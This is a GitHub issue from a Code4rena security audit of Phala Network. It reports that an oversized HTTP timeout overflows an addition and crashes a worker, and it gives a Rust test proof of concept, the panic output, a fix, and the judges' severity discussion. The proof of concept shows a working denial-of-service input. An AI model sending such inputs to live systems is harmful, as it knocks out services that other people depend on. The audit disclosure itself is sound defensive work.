Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

An attacker can crash the cluster system by sending an HTTP request with a huge timeout #43

Open
c4-bot-8 opened this issue Mar 21, 2024 · 12 comments
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Warden finding disagree with severity Sponsor confirms validity, but disagrees with warden’s risk assessment (sponsor explain in comments) downgraded by judge Judge downgraded the risk level of this issue M-04 primary issue Highest quality submission among a set of duplicates 🤖_13_group AI based duplicate group recommendation satisfactory satisfies C4 submission criteria; eligible for awards selected for report This submission will be included/highlighted in the audit report sponsor confirmed Sponsor agrees this is a problem and intends to fix it (OK to use w/ "disagree with severity") sufficient quality report This report is of sufficient quality

Comments

@c4-bot-8
Copy link
Contributor

Lines of code

https://github.com/code-423n4/2024-03-phala-network/blob/a01ffbe992560d8d0f17deadfb9b9a2bed38377e/phala-blockchain/crates/pink/chain-extension/src/lib.rs#L56

Vulnerability details

Impact

Any user can intentionally crash a worker by sending a maliciously crafted request with a huge timeout.
This attack has no costs for the attacker, and it can result in a DoS of the worker/cluster system.

Proof of Concept

A user can specify a timeout when doing a batch_http_request:

    pub fn batch_http_request(requests: Vec<HttpRequest>, timeout_ms: u64) -> ext::BatchHttpResult {
        const MAX_CONCURRENT_REQUESTS: usize = 5;
        if requests.len() > MAX_CONCURRENT_REQUESTS {
            return Err(ext::HttpRequestError::TooManyRequests);
        }
        block_on(async move {
            let futs = requests
                .into_iter()
                .map(|request| async_http_request(request, timeout_ms));
            tokio::time::timeout(
@>              Duration::from_millis(timeout_ms + 200),
                futures::future::join_all(futs),
            )
            .await
        })
        .or(Err(ext::HttpRequestError::Timeout))
    }

https://github.com/code-423n4/2024-03-phala-network/blob/a01ffbe992560d8d0f17deadfb9b9a2bed38377e/phala-blockchain/crates/pink/chain-extension/src/lib.rs#L56

The issue is that in Rust, the + operator can overflow when numerics bound are exceeded: this will result in a panic error.

When a malicious user sends a request with a timeout greater than u64::MAX - 200, they will crash the worker. As this action will cost nothing to the attacker, they can simply send multiple requests to crash all the workers, which will result in a DoS of the cluster system.

Coded PoC

Copy-paste the following test in phala-blockchain/crates/pink/chain-extension/src/mock_ext.rs:

    #[cfg(test)]
    mod tests {
        use crate::PinkRuntimeEnv;
        use pink::chain_extension::{HttpRequest, PinkExtBackend};

        use super::*;

        #[test]
        fn http_timeout_panics() {
            mock_all_ext();
            let ext = MockExtension;
            assert_eq!(ext.address(), &AccountId32::new([0; 32]));
            let responses = ext
                .batch_http_request(
                    vec![
                        HttpRequest {
                            method: "GET".into(),
                            url: "https://httpbin.org/get".into(),
                            body: Default::default(),
                            headers: Default::default(),
                        },
                        HttpRequest {
                            method: "GET".into(),
                            url: "https://httpbin.org/get".into(),
                            body: Default::default(),
                            headers: Default::default(),
                        },
                    ],
                    u64::MAX, //@audit this will cause an overflow
                )
                .unwrap()
                .unwrap();
            assert_eq!(responses.len(), 2);
            for response in responses {
                assert!(response.is_ok());
            }
        }
    }

Output:

    running 1 test
    thread 'mock_ext::tests::http_timeout_panics' panicked at crates/pink/chain-extension/src/lib.rs:66:35:
    attempt to add with overflow
    stack backtrace:
       0: std::panicking::begin_panic_handler
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/std/src/panicking.rs:645
       1: core::panicking::panic_fmt
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/core/src/panicking.rs:72
       2: core::panicking::panic
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/core/src/panicking.rs:127
       3: pink_chain_extension::batch_http_request::async_block$0
                 at ./src/lib.rs:66
       4: tokio::runtime::park::impl$4::block_on::closure$0<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/park.rs:282
       5: tokio::runtime::coop::with_budget
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/coop.rs:107
       6: tokio::runtime::coop::budget
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/coop.rs:73
       7: tokio::runtime::park::CachedParkThread::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/park.rs:282
       8: tokio::runtime::context::blocking::BlockingRegionGuard::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/context/blocking.rs:66
       9: tokio::runtime::scheduler::multi_thread::impl$0::block_on::closure$0<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/scheduler/multi_thread/mod.rs:87
      10: tokio::runtime::context::runtime::enter_runtime<tokio::runtime::scheduler::multi_thread::impl$0::block_on::closure_env$0<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >,enum2$<core::result::Result<alloc::vec::Vec<enum2$<core::result:
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/context/runtime.rs:65
      11: tokio::runtime::scheduler::multi_thread::MultiThread::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/scheduler/multi_thread/mod.rs:86
      12: tokio::runtime::runtime::Runtime::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/runtime.rs:350
      13: pink_chain_extension::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at ./src/lib.rs:50
      14: pink_chain_extension::batch_http_request
                 at ./src/lib.rs:61
      15: pink_chain_extension::impl$1::batch_http_request<pink_chain_extension::mock_ext::MockExtension,alloc::string::String>
                 at ./src/lib.rs:192
      16: pink_chain_extension::mock_ext::impl$1::batch_http_request
                 at ./src/mock_ext.rs:36
      17: pink_chain_extension::mock_ext::tests::http_timeout_panics
                 at ./src/mock_ext.rs:198
      18: pink_chain_extension::mock_ext::tests::http_timeout_panics::closure$0
                 at ./src/mock_ext.rs:194
      19: core::ops::function::FnOnce::call_once<pink_chain_extension::mock_ext::tests::http_timeout_panics::closure_env$0,tuple$<> >
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/core/src/ops/function.rs:250
      20: core::ops::function::FnOnce::call_once
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/core/src/ops/function.rs:250
    note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
    test mock_ext::tests::http_timeout_panics ... FAILED

Tools Used

Manual review

Recommended Mitigation Steps

Consider using saturating_add instead:

    tokio::time::timeout(
-        Duration::from_millis(timeout_ms + 200),
+        Duration::from_millis(timeout_ms.saturating_add(200)),
         futures::future::join_all(futs),
    )

Assessed type

Invalid Validation

@c4-bot-8 c4-bot-8 added 3 (High Risk) Assets can be stolen/lost/compromised directly bug Warden finding labels Mar 21, 2024
c4-bot-6 added a commit that referenced this issue Mar 21, 2024
@c4-bot-12 c4-bot-12 added the 🤖_13_group AI based duplicate group recommendation label Mar 22, 2024
@c4-pre-sort c4-pre-sort added the primary issue Highest quality submission among a set of duplicates label Mar 25, 2024
@c4-pre-sort
Copy link

141345 marked the issue as primary issue

@c4-pre-sort
Copy link

141345 marked the issue as sufficient quality report

@141345
Copy link

141345 commented Mar 25, 2024

no limit on timeout could be abused to DOS the system

@kvinwang
Copy link

kvinwang commented Mar 26, 2024

The runtime doesn't call the implementation directly. Instead, it calls into the worker, via ocalls here, and the timeout is actually clamped in the worker side.
However, the suggested change is good to have. This might be a QA or Mid Risk level report.

@c4-sponsor
Copy link

kvinwang (sponsor) confirmed

@c4-sponsor c4-sponsor added the sponsor confirmed Sponsor agrees this is a problem and intends to fix it (OK to use w/ "disagree with severity") label Mar 26, 2024
@c4-sponsor
Copy link

kvinwang marked the issue as disagree with severity

@c4-sponsor c4-sponsor added the disagree with severity Sponsor confirms validity, but disagrees with warden’s risk assessment (sponsor explain in comments) label Mar 26, 2024
@OpenCoreCH
Copy link

Not sure about the severity here. @kvinwang Could you point out where the clamping happens? Because in the linked code it is a normal u64 that could potentially be set to e.g. u64::MAX - 1 to trigger the issue.

@kvinwang
Copy link

Could you point out where the clamping happens?

This is the OCalls implementation in the worker, where the time remaining is less than the MAX_QUERY_TIME

@OpenCoreCH
Copy link

Great, thanks for the link. In that case, I am downgrading this to a medium: It is not directly exploitable as an attacker, but the issue itself still exists within the codebase and if a future worker would integrate it differently / without limit, it could become exploitable.

@c4-judge c4-judge added 2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value and removed 3 (High Risk) Assets can be stolen/lost/compromised directly labels Mar 28, 2024
@c4-judge
Copy link

OpenCoreCH changed the severity to 2 (Med Risk)

@c4-judge c4-judge added downgraded by judge Judge downgraded the risk level of this issue selected for report This submission will be included/highlighted in the audit report labels Mar 28, 2024
@c4-judge
Copy link

OpenCoreCH marked the issue as selected for report

@c4-judge
Copy link

OpenCoreCH marked the issue as satisfactory

@c4-judge c4-judge added the satisfactory satisfies C4 submission criteria; eligible for awards label Mar 28, 2024
@C4-Staff C4-Staff added the M-04 label Apr 1, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Warden finding disagree with severity Sponsor confirms validity, but disagrees with warden’s risk assessment (sponsor explain in comments) downgraded by judge Judge downgraded the risk level of this issue M-04 primary issue Highest quality submission among a set of duplicates 🤖_13_group AI based duplicate group recommendation satisfactory satisfies C4 submission criteria; eligible for awards selected for report This submission will be included/highlighted in the audit report sponsor confirmed Sponsor agrees this is a problem and intends to fix it (OK to use w/ "disagree with severity") sufficient quality report This report is of sufficient quality
Projects
None yet
Development

No branches or pull requests

9 participants